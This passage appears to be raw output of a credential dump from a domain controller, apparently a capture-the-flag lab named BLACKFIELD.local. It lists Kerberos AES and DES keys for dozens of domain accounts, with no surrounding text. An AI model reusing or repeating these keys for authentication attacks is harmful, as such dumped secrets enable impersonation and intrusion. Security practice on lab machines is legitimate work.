            BLACKFIELD.local\BLACKFIELD533886:aes256-cts-hmac-sha1-96:fca934b59a4a4a2f7a69fc6cacbb4b1763b3a0406495fd5c5488c8bc6fcd4249
            BLACKFIELD.local\BLACKFIELD533886:aes128-cts-hmac-sha1-96:ac0e3b7e3e6059d9b54fcf896fdcce8a
            BLACKFIELD.local\BLACKFIELD533886:des-cbc-md5:6b0b1aa22f6dab01
            BLACKFIELD.local\BLACKFIELD268320:aes256-cts-hmac-sha1-96:c549815fab1dfd35ed183545c837ae77d4820eed6cf25a088b1baf3e12e134dc
            BLACKFIELD.local\BLACKFIELD268320:aes128-cts-hmac-sha1-96:9dfcea5029dfaf2e897c280a528fb86b
            BLACKFIELD.local\BLACKFIELD268320:des-cbc-md5:c180264a15ba7f31
            BLACKFIELD.local\BLACKFIELD909590:aes256-cts-hmac-sha1-96:72d81836337e607392c87ea1215ab63c5b2295b6e634fe51eefae125e97cf832
            BLACKFIELD.local\BLACKFIELD909590:aes128-cts-hmac-sha1-96:3f848270065978ca4c3ef8fe6c80afb7
            BLACKFIELD.local\BLACKFIELD909590:des-cbc-md5:8ae362d3028a2931
            BLACKFIELD.local\BLACKFIELD136813:aes256-cts-hmac-sha1-96:913869d919a6966fa248105fc077d8d77b8471f38aec32de326c5aaa004931bb
            BLACKFIELD.local\BLACKFIELD136813:aes128-cts-hmac-sha1-96:e12a5fb71f76246a59f13e179b676737
            BLACKFIELD.local\BLACKFIELD136813:des-cbc-md5:1cfbd04aab89b96e
            BLACKFIELD.local\BLACKFIELD358090:aes256-cts-hmac-sha1-96:671cf9d64bf53ca190811674419188e3c98eb9c17ff1796a72c433a7f9302342
            BLACKFIELD.local\BLACKFIELD358090:aes128-cts-hmac-sha1-96:e4b6df75ee7bba975a167756b40e3e64
            BLACKFIELD.local\BLACKFIELD358090:des-cbc-md5:5d70d632f86e2fe0
            BLACKFIELD.local\BLACKFIELD561870:aes256-cts-hmac-sha1-96:394216f151a192938a2f243dc91ee8823bb1eeb07f630145581f6d325d6e893e
            BLACKFIELD.local\BLACKFIELD561870:aes128-cts-hmac-sha1-96:3bd48ada453081342bc43ca5b9990e46
            BLACKFIELD.local\BLACKFIELD561870:des-cbc-md5:8325f843ba23f892
            BLACKFIELD.local\BLACKFIELD269538:aes256-cts-hmac-sha1-96:b5c752790c87c6efe9f715d2812e98237ca75268e27017d993c517c79ccb5e40
            BLACKFIELD.local\BLACKFIELD269538:aes128-cts-hmac-sha1-96:18cbc0b1e6f0093bf9b9ea5fe4e6722e
            BLACKFIELD.local\BLACKFIELD269538:des-cbc-md5:10f49b626b07d062
            BLACKFIELD.local\BLACKFIELD169035:aes256-cts-hmac-sha1-96:528a99df46433dca045146ce02a33424267fb20bb5f8bed660031a3de5b0f0b0
            BLACKFIELD.local\BLACKFIELD169035:aes128-cts-hmac-sha1-96:00e7d0e1ec309673c97474d53af71a70
            BLACKFIELD.local\BLACKFIELD169035:des-cbc-md5:d0864aab8aefe9e9
            BLACKFIELD.local\BLACKFIELD118321:aes256-cts-hmac-sha1-96:c955c4efcf0fff0a9f8733c31f7d90ca511fa4872d174705ef9d1ac1911c86ee
            BLACKFIELD.local\BLACKFIELD118321:aes128-cts-hmac-sha1-96:13f3036093c7b9ec37b31a683c44351b
            BLACKFIELD.local\BLACKFIELD118321:des-cbc-md5:2a75c7c2c29b2f3b
            BLACKFIELD.local\BLACKFIELD592556:aes256-cts-hmac-sha1-96:f4aa50e1ccc96e01b2c243f19a52fa1eb040212b076b79bce67cab9d1181f681
            BLACKFIELD.local\BLACKFIELD592556:aes128-cts-hmac-sha1-96:326e92ce766b4942287cfd8bc13a3e10
            BLACKFIELD.local\BLACKFIELD592556:des-cbc-md5:02fb1cb026cd80ab
            BLACKFIELD.local\BLACKFIELD618519:aes256-cts-hmac-sha1-96:00d916fc31479e90abae414aa7261e5c0d04b0ef6b35e7eb59595e2088f485c9
            BLACKFIELD.local\BLACKFIELD618519:aes128-cts-hmac-sha1-96:1185cb37c06d7ae32dd6488840be6043
            BLACKFIELD.local\BLACKFIELD618519:des-cbc-md5:9e7f5b80ea162329
            BLACKFIELD.local\BLACKFIELD329802:aes256-cts-hmac-sha1-96:c542822df2baeb7e223e410684553c5c22ffa6d64c4ae09a0296623af049d0de
            BLACKFIELD.local\BLACKFIELD329802:aes128-cts-hmac-sha1-96:563a6361e978f8755820fd10d9948885
            BLACKFIELD.local\BLACKFIELD329802:des-cbc-md5:4ae6ec7c26b0c7ae
            BLACKFIELD.local\BLACKFIELD753480:aes256-cts-hmac-sha1-96:d05ec70f521d5869a572e9567abc710c7d78a2a052a90f24327c4b41efa420d6
            BLACKFIELD.local\BLACKFIELD753480:aes128-cts-hmac-sha1-96:b304bb2555d7a3c9315f4a2862379ec1
            BLACKFIELD.local\BLACKFIELD753480:des-cbc-md5:1616b99791a16158
            BLACKFIELD.local\BLACKFIELD837541:aes256-cts-hmac-sha1-96:914879a5387b091cda211bab0579672d1b4023ab8b17d6efaeac821889c5823b
            BLACKFIELD.local\BLACKFIELD837541:aes128-cts-hmac-sha1-96:7e406abd47f34bf1fdd1fed6f18c4f7a
            BLACKFIELD.local\BLACKFIELD837541:des-cbc-md5:7652838af254a8f7
            BLACKFIELD.local\BLACKFIELD186980:aes256-cts-hmac-sha1-96:6a1217ea6c2e5cf61647a82913afb75679efd2159f6ef30fe3f02da490430615
            BLACKFIELD.local\BLACKFIELD186980:aes128-cts-hmac-sha1-96:12384f7e357330f2bfee34490796d3bc
            BLACKFIELD.local\BLACKFIELD186980:des-cbc-md5:2ada16290d75f8c8
            BLACKFIELD.local\BLACKFIELD419600:aes256-cts-hmac-sha1-96:497df360e93a976f42003a16fd5a21c33d83f74da00f6c459aba068d577254c1
            BLACKFIELD.local\BLACKFIELD419600:aes128-cts-hmac-sha1-96:718c187d4a511754dc150386e45fe0c7
            BLACKFIELD.local\BLACKFIELD419600:des-cbc-md5:9845a789a72c9e9b
            BLACKFIELD.local\BLACKFIELD220786:aes256-cts-hmac-sha1-96:2b57b357cbe0bc43d1dfa8531f51c19a5c9c75dfadb3a805f2d4be6104a3f980
            BLACKFIELD.local\BLACKFIELD220786:aes128-cts-hmac-sha1-96:8b95f67dc32c8c6a5ceb3cef8c606f33
            BLACKFIELD.local\BLACKFIELD220786:des-cbc-md5:cd7c894946649d0d
            BLACKFIELD.local\BLACKFIELD767820:aes256-cts-hmac-sha1-96:6e8361d238b4d6be98674f4e779b748d55984b70722c8eb8cce00c57bbe03ccb
            BLACKFIELD.local\BLACKFIELD767820:aes128-cts-hmac-sha1-96:4371c5b5c1c61edb0cada394ea80d273
            BLACKFIELD.local\BLACKFIELD767820:des-cbc-md5:250832266d3b258a
            BLACKFIELD.local\BLACKFIELD549571:aes256-cts-hmac-sha1-96:32102cda7638bef76cf3eb988e573a8b84fc788683ef6d485e9cedff1d8e5446
            BLACKFIELD.local\BLACKFIELD549571:aes128-cts-hmac-sha1-96:8856d41e0d8524d48a2380426992451f
            BLACKFIELD.local\BLACKFIELD549571:des-cbc-md5:4c19a4ad971f6bc2
            BLACKFIELD.local\BLACKFIELD411740:aes256-cts-hmac-sha1-96:31a43f807654bac9224ea4372a51a0b02573196b14a366086694a3228df41797
            BLACKFIELD.local\BLACKFIELD411740:aes128-cts-hmac-sha1-96:0336a555e9aa06b7e0aa394c1b5cf3c5
            BLACKFIELD.local\BLACKFIELD411740:des-cbc-md5:20ece3ce687a2351
            BLACKFIELD.local\BLACKFIELD768095:aes256-cts-hmac-sha1-96:a9c521e79dba1b36415bdac36ea2fb88c83162186b242dee7061ead65fb7fb99
            BLACKFIELD.local\BLACKFIELD768095:aes128-cts-hmac-sha1-96:11d373311d4ddc13d1fcfb0365ff2533
            BLACKFIELD.local\BLACKFIELD768095:des-cbc-md5:6b435d73a1a89715
            BLACKFIELD.local\BLACKFIELD835725:aes256-cts-hmac-sha1-96:235a170c384a99f257f78eedb362d09fa0136354948e9f86d835c31da22d076e
            BLACKFIELD.local\BLACKFIELD835725:aes128-cts-hmac-sha1-96:b31a0f9271b9b87d8686197a701cd835
            BLACKFIELD.local\BLACKFIELD835725:des-cbc-md5:203729927c2901d6
            BLACKFIELD.local\BLACKFIELD251977:aes256-cts-hmac-sha1-96:5d008ebdb4683be505210b3d2f51d9be7bf87b0ffe5da56664c7c7b539473658
            BLACKFIELD.local\BLACKFIELD251977:aes128-cts-hmac-sha1-96:898d855463f5466b01e31828e72652db
            BLACKFIELD.local\BLACKFIELD251977:des-cbc-md5:ad5475867f7a16d0
            BLACKFIELD.local\BLACKFIELD430864:aes256-cts-hmac-sha1-96:1196da45425a51a18cc7d930ce7a12fe953cd68768a25dcbd56d71b9b4d41044
            BLACKFIELD.local\BLACKFIELD430864:aes128-cts-hmac-sha1-96:194e0d0e8bbd5beb01811d96a77b6314
            BLACKFIELD.local\BLACKFIELD430864:des-cbc-md5:f75d521546fd5420
            BLACKFIELD.local\BLACKFIELD413242:aes256-cts-hmac-sha1-96:81cc04d0ed872010cf8493f045ed38584043e98cd5d5f8cb94fab205d2213a83
            BLACKFIELD.local\BLACKFIELD413242:aes128-cts-hmac-sha1-96:1675460e4b796d3c5ba8ed527fe11628
            BLACKFIELD.local\BLACKFIELD413242:des-cbc-md5:5eda6e917c5168a7
            BLACKFIELD.local\BLACKFIELD464763:aes256-cts-hmac-sha1-96:611b76d0d767e22a3f3e7b9e7b415b8b22caebf7de494afc2c52b39ee9f24870
            BLACKFIELD.local\BLACKFIELD464763:aes128-cts-hmac-sha1-96:6708b10579c83822142a044117d83f79
            BLACKFIELD.local\BLACKFIELD464763:des-cbc-md5:da43aed557497552
            BLACKFIELD.local\BLACKFIELD266096:aes256-cts-hmac-sha1-96:26de26d38cbe7a5965243222d7a37c0106fbfb4ce82c4bd674c1d9271e76fc24
            BLACKFIELD.local\BLACKFIELD266096:aes128-cts-hmac-sha1-96:ef7d60d48f59b171a3e3c56d0a434ed1
            BLACKFIELD.local\BLACKFIELD266096:des-cbc-md5:ae5b49cebc6d9226
            BLACKFIELD.local\BLACKFIELD334058:aes256-cts-hmac-sha1-96:4eafa499e5107c92aa4fc23f596a9bcf6d8b4700f8fc1050a5240e238468023b
            BLACKFIELD.local\BLACKFIELD334058:aes128-cts-hmac-sha1-96:140632313bc8313041258f0b339a9d1c
            BLACKFIELD.local\BLACKFIELD334058:des-cbc-md5:928680fbbca25857
            BLACKFIELD.local\BLACKFIELD404213:aes256-cts-hmac-sha1-96:ed11bb8c047ef94ab9de17045fc0b47851d73ae7ef1828fef93a7488d8b69f08
            BLACKFIELD.local\BLACKFIELD404213:aes128-cts-hmac-sha1-96:4e07a1517c7ed8254ac460b46a956a2d
            BLACKFIELD.local\BLACKFIELD404213:des-cbc-md5:bf80b334bfcb755d
            BLACKFIELD.local\BLACKFIELD219324:aes256-cts-hmac-sha1-96:32fc456ab3534ab1588b6bb1853f5d41a77719646414f286de2b393de9360fc0
            BLACKFIELD.local\BLACKFIELD219324:aes128-cts-hmac-sha1-96:31431dc6f83b0f318f453739a515aad4
            BLACKFIELD.local\BLACKFIELD219324:des-cbc-md5:49df4c4f4658c48f
            BLACKFIELD.local\BLACKFIELD412798:aes256-cts-hmac-sha1-96:71d0e73cd18a77aba1801febb2803138c787e27b8dcbc82e7dd5cb8822628162
            BLACKFIELD.local\BLACKFIELD412798:aes128-cts-hmac-sha1-96:4cd8f20f62775939b7a18850fe5d02b7
            BLACKFIELD.local\BLACKFIELD412798:des-cbc-md5:131a4a7c62b0fe20
            BLACKFIELD.local\BLACKFIELD441593:aes256-cts-hmac-sha1-96:518e395b4f75b71519cef9ff98bcf89f114662c933f973d7ea9372c1fd9244ca
            BLACKFIELD.local\BLACKFIELD441593:aes128-cts-hmac-sha1-96:d2f2c1637e0b4d1baf977865730b313b
            BLACKFIELD.local\BLACKFIELD441593:des-cbc-md5:bf7329571c6e648c
            BLACKFIELD.local\BLACKFIELD606328:aes256-cts-hmac-sha1-96:b29ee0fd41e55d987b9bee7e1c7fe573655d4259fccf3beaefa08124e2ad1f07
            BLACKFIELD.local\BLACKFIELD606328:aes128-cts-hmac-sha1-96:3e953832b049763e02f36349a3d48e00
            BLACKFIELD.local\BLACKFIELD606328:des-cbc-md5:6ed698ceba263ea7
            BLACKFIELD.local\BLACKFIELD796301:aes256-cts-hmac-sha1-96:d8c4169b10f34b5d1f280464eca66d67179b40bb19e8bdd137d647d98610154a
            BLACKFIELD.local\BLACKFIELD796301:aes128-cts-hmac-sha1-96:525982c524e3a9a590acc674f7f044cf
            BLACKFIELD.local\BLACKFIELD796301:des-cbc-md5:5d132a8cb9205d5d
            BLACKFIELD.local\BLACKFIELD415829:aes256-cts-hmac-sha1-96:69bed7565f9c53740aacdfaf71c2c4454820a1e7b1ddc4c4f0ca4e03182503b4
            BLACKFIELD.local\BLACKFIELD415829:aes128-cts-hmac-sha1-96:8d8bedf1a9f448d064f615350e68562a
            BLACKFIELD.local\BLACKFIELD415829:des-cbc-md5:407f10d515b343c4
            BLACKFIELD.local\BLACKFIELD820995:aes256-cts-hmac-sha1-96:e0dff49ff06279532e4be07ffd48051c1e01a2992748ead45afa08f6a875097f
            BLACKFIELD.local\BLACKFIELD820995:aes128-cts-hmac-sha1-96:ee4a670e0c7cc53e88fad395aba49a5d
            BLACKFIELD.local\BLACKFIELD820995:des-cbc-md5:0889e3079e0dcd54
            BLACKFIELD.local\BLACKFIELD695166:aes256-cts-hmac-sha1-96:e98f7b0eb682d926c1bb28fcc8b9cb34160f7c13448915994a5cbdf679817ad0
            BLACKFIELD.local\BLACKFIELD695166:aes128-cts-hmac-sha1-96:e8eede5e83779385f8abaeb683ab4c26
            BLACKFIELD.local\BLACKFIELD695166:des-cbc-md5:267f513e408cfd19
            BLACKFIELD.local\BLACKFIELD759042:aes256-cts-hmac-sha1-96:b3e248f634a93bfd97ec8d609148b8f6b86aa830ed10e9d5f0da757a476364a6
            BLACKFIELD.local\BLACKFIELD759042:aes128-cts-hmac-sha1-96:2d2c25658c9932b40b120cde8a3ba2b6
            BLACKFIELD.local\BLACKFIELD759042:des-cbc-md5:c189f2dfe9c23b85
            BLACKFIELD.local\BLACKFIELD607290:aes256-cts-hmac-sha1-96:86ee513cd4a8dc44edeb3a1391b33e9f5a1e0aabfb8de4a53f4a4b2c48e15ead
            BLACKFIELD.local\BLACKFIELD607290:aes128-cts-hmac-sha1-96:4d38b694caf593433c9187afe4b8f876
            BLACKFIELD.local\BLACKFIELD607290:des-cbc-md5:3ec273677561dfad
            BLACKFIELD.local\BLACKFIELD229506:aes256-cts-hmac-sha1-96:4b6079ef56b1201703a746031909a4cda7f361a94c5fa13d892f1b65323bb961
            BLACKFIELD.local\BLACKFIELD229506:aes128-cts-hmac-sha1-96:f2459800e9f475e41861b5781df12b43
            BLACKFIELD.local\BLACKFIELD229506:des-cbc-md5:c8835d25ba516bfd
            BLACKFIELD.local\BLACKFIELD256791:aes256-cts-hmac-sha1-96:19b027f82e6179392156f807c1bb6c1179dd4ecf1d8e86fa4fc772f937c4dcd3
            BLACKFIELD.local\BLACKFIELD256791:aes128-cts-hmac-sha1-96:12ae4df1730246013db4576b7d571eae
            BLACKFIELD.local\BLACKFIELD256791:des-cbc-md5:451f6e7f97c87679
            BLACKFIELD.local\BLACKFIELD997545:aes256-cts-hmac-sha1-96:c21ee5ea0ef00b2b63898e2a93adbea89cf76b80e3f69195be9d2ae9340213f0
            BLACKFIELD.local\BLACKFIELD997545:aes128-cts-hmac-sha1-96:45d33004d411b02429c62afa88026775
            BLACKFIELD.local\BLACKFIELD997545:des-cbc-md5:372aeabc1558e9da
            BLACKFIELD.local\BLACKFIELD114762:aes256-cts-hmac-sha1-96:cd59d579330ed9464de3277bdffe9696fd30b8c562f2e6e915ba0bc45d0be1b8
            BLACKFIELD.local\BLACKFIELD114762:aes128-cts-hmac-sha1-96:989d7baa2d9ec4eb734a108155a9d835
            BLACKFIELD.local\BLACKFIELD114762:des-cbc-md5:8c2f61dc702f6401
            BLACKFIELD.local\BLACKFIELD321206:aes256-cts-hmac-sha1-96:865cb29af7ebe57834fb0ea4918938197cc8dd2e57a13128aca563ac6335222a
            BLACKFIELD.local\BLACKFIELD321206:aes128-cts-hmac-sha1-96:37513e7ff961c36a857a1b612e9ed8e6
            BLACKFIELD.local\BLACKFIELD321206:des-cbc-md5:aebf575d8fc17615
            BLACKFIELD.local\BLACKFIELD195757:aes256-cts-hmac-sha1-96:438f5890767c9519149b1a2ad4c4655ac9f7c4fbdcb32253b4591a52daf2b3bd
            BLACKFIELD.local\BLACKFIELD195757:aes128-cts-hmac-sha1-96:cd4682bfd688f66dcf4009caf8ff215d
            BLACKFIELD.local\BLACKFIELD195757:des-cbc-md5:d6ba49da79e98ce0
            BLACKFIELD.local\BLACKFIELD877328:aes256-cts-hmac-sha1-96:ec36d414184fc78396dc2043f309306302ff290356612d1f4d949719ecfc6d8b
            BLACKFIELD.local\BLACKFIELD877328:aes128-cts-hmac-sha1-96:4aa2611ef5813e4b9f649d356ebbfac1
            BLACKFIELD.local\BLACKFIELD877328:des-cbc-md5:45ecfdeacd4a2f51
            BLACKFIELD.local\BLACKFIELD446463:aes256-cts-hmac-sha1-96:98b7e90bd47bad7dca78253a50857a39733630b9227e0d0c47ee28ff131242db
            BLACKFIELD.local\BLACKFIELD446463:aes128-cts-hmac-sha1-96:6f99d45c95d696e2fbd1c45139514650
            BLACKFIELD.local\BLACKFIELD446463:des-cbc-md5:83a4e3579402ce76
            BLACKFIELD.local\BLACKFIELD579980:aes256-cts-hmac-sha1-96:a2f89ea33562b7f62d7f5e8e7ef118c8180b301a612ab1c500b41ccf646c04ca
            BLACKFIELD.local\BLACKFIELD579980:aes128-cts-hmac-sha1-96:d5cd3c44d22c237f15b799803b746105
            BLACKFIELD.local\BLACKFIELD579980:des-cbc-md5:ef61c4c7fdea52c1
            BLACKFIELD.local\BLACKFIELD775126:aes256-cts-hmac-sha1-96:c0d08cdd79c756b9fea6c5a14647d2d5a72a6cee43942d9547aa8d18a81a4ec3
            BLACKFIELD.local\BLACKFIELD775126:aes128-cts-hmac-sha1-96:71a1b6d3e1832810be35326196ead735
            BLACKFIELD.local\BLACKFIELD775126:des-cbc-md5:ec7646e323fbcdb5
            BLACKFIELD.local\BLACKFIELD429587:aes256-cts-hmac-sha1-96:3eefe5404fe4924323a9120fe40c10d7c169d5e52a9dab3b6d970d2a78571001
            BLACKFIELD.local\BLACKFIELD429587:aes128-cts-hmac-sha1-96:5995545b08375d08d7f6e32b0f18b1bf
            BLACKFIELD.local\BLACKFIELD429587:des-cbc-md5:79f219291f86b5a2
            BLACKFIELD.local\BLACKFIELD534956:aes256-cts-hmac-sha1-96:6e3752d8676999691b3d2225c5f1d58ab53517df8bcb05665a539ab4e5bc7e7c
            BLACKFIELD.local\BLACKFIELD534956:aes128-cts-hmac-sha1-96:47de45dadaff8e5e5dba4ae83b22fdb2
            BLACKFIELD.local\BLACKFIELD534956:des-cbc-md5:76e06eba3e9e4349
            BLACKFIELD.local\BLACKFIELD315276:aes256-cts-hmac-sha1-96:7135cdf551183a558dc9d7de203b3a2dc4a7884dd52725c03eb2e2e578400e33
            BLACKFIELD.local\BLACKFIELD315276:aes128-cts-hmac-sha1-96:f872c82857f5307ebed24a67b998465c
            BLACKFIELD.local\BLACKFIELD315276:des-cbc-md5:0edf2f9b490186b9
            BLACKFIELD.local\BLACKFIELD995218:aes256-cts-hmac-sha1-96:76e79177ca34750d2d99d47e85de848c76e2384749953a3115ac18f36766d259
            BLACKFIELD.local\BLACKFIELD995218:aes128-cts-hmac-sha1-96:406d20fd788069e0116a7c4038d829fa
            BLACKFIELD.local\BLACKFIELD995218:des-cbc-md5:1c58bc516773d64c
            BLACKFIELD.local\BLACKFIELD843883:aes256-cts-hmac-sha1-96:804a97f39712a5e24ee15c1c7a0e76027cb8fc1b185e50d5227b6d0f324d3903
            BLACKFIELD.local\BLACKFIELD843883:aes128-cts-hmac-sha1-96:220ea20977e8aaa8a2e244d906f1ab9d
            BLACKFIELD.local\BLACKFIELD843883:des-cbc-md5:3d6d580bfdf4ba1a
            BLACKFIELD.local\BLACKFIELD876916:aes256-cts-hmac-sha1-96:28e5910d08ff6cf3444f12249fa066d24412a3fb9d5f290a86df3fcf4a39569f
            BLACKFIELD.local\BLACKFIELD876916:aes128-cts-hmac-sha1-96:b303c099c55c7a70e76ab8c5bb640354
            BLACKFIELD.local\BLACKFIELD876916:des-cbc-md5:6deab58c7634683e
            BLACKFIELD.local\BLACKFIELD382769:aes256-cts-hmac-sha1-96:0c1ab89863d6482be6ebce7b625628fd0464ac9e149eb98f25ceebc7f1d2fe01
            BLACKFIELD.local\BLACKFIELD382769:aes128-cts-hmac-sha1-96:3b76a2df7273e7f16923f0f19e9c143a
            BLACKFIELD.local\BLACKFIELD382769:des-cbc-md5:da89b358291380f8
            BLACKFIELD.local\BLACKFIELD194732:aes256-cts-hmac-sha1-96:c5a9ff4b9968232b796b836834c4468e2f1f03d2f902cddaaecc432594bfd8ed
            BLACKFIELD.local\BLACKFIELD194732:aes128-cts-hmac-sha1-96:f1b40ef2c8d198d826872d5969b21fed
            BLACKFIELD.local\BLACKFIELD194732:des-cbc-md5:46ba2913b067c86d
            BLACKFIELD.local\BLACKFIELD191416:aes256-cts-hmac-sha1-96:0e417894bf1265b9a2d147037b1b16662a1a80cd0d1fe7379ac08241a146dd0d
            BLACKFIELD.local\BLACKFIELD191416:aes128-cts-hmac-sha1-96:7dc373cab92927dcd66aafe38081d298
            BLACKFIELD.local\BLACKFIELD191416:des-cbc-md5:f1f738ea08f4378a
            BLACKFIELD.local\BLACKFIELD932709:aes256-cts-hmac-sha1-96:3bb9a08c8730f9c9c04da16e0d939639137e4e7fe009e17b95ef0e7459c44253
            BLACKFIELD.local\BLACKFIELD932709:aes128-cts-hmac-sha1-96:e2ce7c9f7a7b628c7a6dd409f534958d
            BLACKFIELD.local\BLACKFIELD932709:des-cbc-md5:259d1f70ae9b2f5e
            BLACKFIELD.local\BLACKFIELD546640:aes256-cts-hmac-sha1-96:4bf5a610108a77d1372caf39b749de5ca426375fd2a69f815d163c9fa6e5b688
            BLACKFIELD.local\BLACKFIELD546640:aes128-cts-hmac-sha1-96:7803b3905d5cd4b2155c965fcc764bc8
            BLACKFIELD.local\BLACKFIELD546640:des-cbc-md5:b54931f7c2ba73ad
            BLACKFIELD.local\BLACKFIELD569313:aes256-cts-hmac-sha1-96:9d3e61de8d8f8430828f9cfeb95d2c3baab7302dfd54a799dcfa0d72b19157c9
            BLACKFIELD.local\BLACKFIELD569313:aes128-cts-hmac-sha1-96:7317941f1d1b6e65aa273dc76af70b73
            BLACKFIELD.local\BLACKFIELD569313:des-cbc-md5:d5bf3d9e7afb92ad
            BLACKFIELD.local\BLACKFIELD744790:aes256-cts-hmac-sha1-96:6946857cea544d60a7494dfe6dce1480aac10723114f870067f5f9e3eaa8fbe1
            BLACKFIELD.local\BLACKFIELD744790:aes128-cts-hmac-sha1-96:97e300b152769ebe6086114d5be50946
            BLACKFIELD.local\BLACKFIELD744790:des-cbc-md5:047919f2cd135475
            BLACKFIELD.local\BLACKFIELD739659:aes256-cts-hmac-sha1-96:4588fa5c200b17a8b69518e7259dfb3281607574136c216155d0d3ff0ea1622b
            BLACKFIELD.local\BLACKFIELD739659:aes128-cts-hmac-sha1-96:25af5c721b8550a993e223d47a7ff17b
            BLACKFIELD.local\BLACKFIELD739659:des-cbc-md5:58ae98da07b3522f
            BLACKFIELD.local\BLACKFIELD926559:aes256-cts-hmac-sha1-96:635639f776b5909ba7859dd066fcc0d67599621602f2ac8d3113791d949a2138
            BLACKFIELD.local\BLACKFIELD926559:aes128-cts-hmac-sha1-96:53b09efcea1751a236515613c5b91e7e
            BLACKFIELD.local\BLACKFIELD926559:des-cbc-md5:a49e043279511597
            BLACKFIELD.local\BLACKFIELD969352:aes256-cts-hmac-sha1-96:7ac71c317cd14c9dcac221b4cbbcb921e2874446402a737b896d13f1f963734b
            BLACKFIELD.local\BLACKFIELD969352:aes128-cts-hmac-sha1-96:b89e6946be1f8b94d064825910d390c5
            BLACKFIELD.local\BLACKFIELD969352:des-cbc-md5:3480a8fb7cdab6b5
            BLACKFIELD.local\BLACKFIELD253047:aes256-cts-hmac-sha1-96:e314a2d10f310a835cbeb49f96e4f6ae437e59296dbe6801428fed2d269f7d33
            BLACKFIELD.local\BLACKFIELD253047:aes128-cts-hmac-sha1-96:90a99202baf97c03ca717667c7369c04
            BLACKFIELD.local\BLACKFIELD253047:des-cbc-md5:ad914c916201687c
            BLACKFIELD.local\BLACKFIELD899433:aes256-cts-hmac-sha1-96:ce70506199d98855e07ca51b2814c0556f91716c5500c04bcc0db4bb938e2052
            BLACKFIELD.local\BLACKFIELD899433:aes128-cts-hmac-sha1-96:63dda1851bbce7bf689c65537188931c
            BLACKFIELD.local\BLACKFIELD899433:des-cbc-md5:e6f7d698324ce973
            BLACKFIELD.local\BLACKFIELD606964:aes256-cts-hmac-sha1-96:6610d055a0c6ad512d6bc83a7ed125e0c40c3aa0a32881ba0fac2970cf209855
            BLACKFIELD.local\BLACKFIELD606964:aes128-cts-hmac-sha1-96:a2d7a844b5616af77b98b5fbd7032313
            BLACKFIELD.local\BLACKFIELD606964:des-cbc-md5:0dcb26dfa4efe9c1
            BLACKFIELD.local\BLACKFIELD385719:aes256-cts-hmac-sha1-96:8428719793443ee3043a68ab16ff7f44ae58da92f26ef9a7c65b9e9a93b3eba9
            BLACKFIELD.local\BLACKFIELD385719:aes128-cts-hmac-sha1-96:66ea45f5890435f77da91b40bb579c5d
            BLACKFIELD.local\BLACKFIELD385719:des-cbc-md5:295e8329801f7f64
            BLACKFIELD.local\BLACKFIELD838710:aes256-cts-hmac-sha1-96:7bae08b61fa7ed283ab401438372027e0bb658e2f0f6f5417dfa7859bdf73e40
            BLACKFIELD.local\BLACKFIELD838710:aes128-cts-hmac-sha1-96:2c7abb4b2ccbbd8e2047a8f9d3b8b9a8
            BLACKFIELD.local\BLACKFIELD838710:des-cbc-md5:a291b35437fd3e5b
            BLACKFIELD.local\BLACKFIELD608914:aes256-cts-hmac-sha1-96:91bc5719e31dd925e871e951a17e1a100eb0a84f25e6c94486bee2a6c68cdd90
            BLACKFIELD.local\BLACKFIELD608914:aes128-cts-hmac-sha1-96:7daac7805fa90b2ab6655cda3edd1e96
            BLACKFIELD.local\BLACKFIELD608914:des-cbc-md5:10f2c8b5ad1925cd
            BLACKFIELD.local\BLACKFIELD569653:aes256-cts-hmac-sha1-96:466bec4b4cc69bcff4e0c3c766987b3bea068a3475a28541c9f89ee1a5db5a3d
            BLACKFIELD.local\BLACKFIELD569653:aes128-cts-hmac-sha1-96:b4fbf0ead8c382c4bc969077ce03baea
            BLACKFIELD.local\BLACKFIELD569653:des-cbc-md5:0e4c4a61401feff4
            BLACKFIELD.local\BLACKFIELD759079:aes256-cts-hmac-sha1-96:36fcedb18ed0d2c2d8321619c4831b04e3543281f7996b588d9ba473b07d5bb1
            BLACKFIELD.local\BLACKFIELD759079:aes128-cts-hmac-sha1-96:61b118f8b2dc789cc462f860032a2547
            BLACKFIELD.local\BLACKFIELD759079:des-cbc-md5:58f48586b06ea8ba
            BLACKFIELD.local\BLACKFIELD488531:aes256-cts-hmac-sha1-96:3c1ca8c63d33772ebfef73dc006c4217c82925f81798463dc950d541c2e19e7e
            BLACKFIELD.local\BLACKFIELD488531:aes128-cts-hmac-sha1-96:409672952662ff4ab5778ab11b5c4b48
            BLACKFIELD.local\BLACKFIELD488531:des-cbc-md5:92b96e516bf2abc8
            BLACKFIELD.local\BLACKFIELD160610:aes256-cts-hmac-sha1-96:f8cb2868b3619e83dcc1cca69284211438dacdcb0816accfcb2333185c144dbf
            BLACKFIELD.local\BLACKFIELD160610:aes128-cts-hmac-sha1-96:d89ba9204480553da1cf6f944e3a9ab1
            BLACKFIELD.local\BLACKFIELD160610:des-cbc-md5:8af4cd0ebfe67cd3
            BLACKFIELD.local\BLACKFIELD586934:aes256-cts-hmac-sha1-96:cfb01ee1bff2106e89a884da701b1d3d7d3ba2a4772a852e8aa1c4761a2a3a95
            BLACKFIELD.local\BLACKFIELD586934:aes128-cts-hmac-sha1-96:9af8b1fe7d085691ac610c8d0f6871e0
            BLACKFIELD.local\BLACKFIELD586934:des-cbc-md5:833d94ce157ce5fb
            BLACKFIELD.local\BLACKFIELD819822:aes256-cts-hmac-sha1-96:a7140178a78236b0f0f3c915e7829054fec87c3ee85b89b0d0b6e8f00f2356cb
            BLACKFIELD.local\BLACKFIELD819822:aes128-cts-hmac-sha1-96:37d5f5914c0e3c1aa7e051c2b2b9ec37
            BLACKFIELD.local\BLACKFIELD819822:des-cbc-md5:a202df3491927f89
            BLACKFIELD.local\BLACKFIELD739765:aes256-cts-hmac-sha1-96:f693246087bc8b83ffcb8b06530254615a369273493f02607727815c5b18c7b8
            BLACKFIELD.local\BLACKFIELD739765:aes128-cts-hmac-sha1-96:5235666a1131919409359a1dc04e61ce
            BLACKFIELD.local\BLACKFIELD739765:des-cbc-md5:8938798a7c2c4fad
            BLACKFIELD.local\BLACKFIELD875008:aes256-cts-hmac-sha1-96:e81f07273f2f525f2fd851f92c44c436d2d839aef0d4a0721c2da20ccb416e01
            BLACKFIELD.local\BLACKFIELD875008:aes128-cts-hmac-sha1-96:5ed3f10509a8e35e9c6a0a377cc90a80
            BLACKFIELD.local\BLACKFIELD875008:des-cbc-md5:8fef4a9eb6255dec
            BLACKFIELD.local\BLACKFIELD441759:aes256-cts-hmac-sha1-96:fe8c6a6652644f80fdebe719dcfe71fd69864806f936e7b2ffb177972989834e
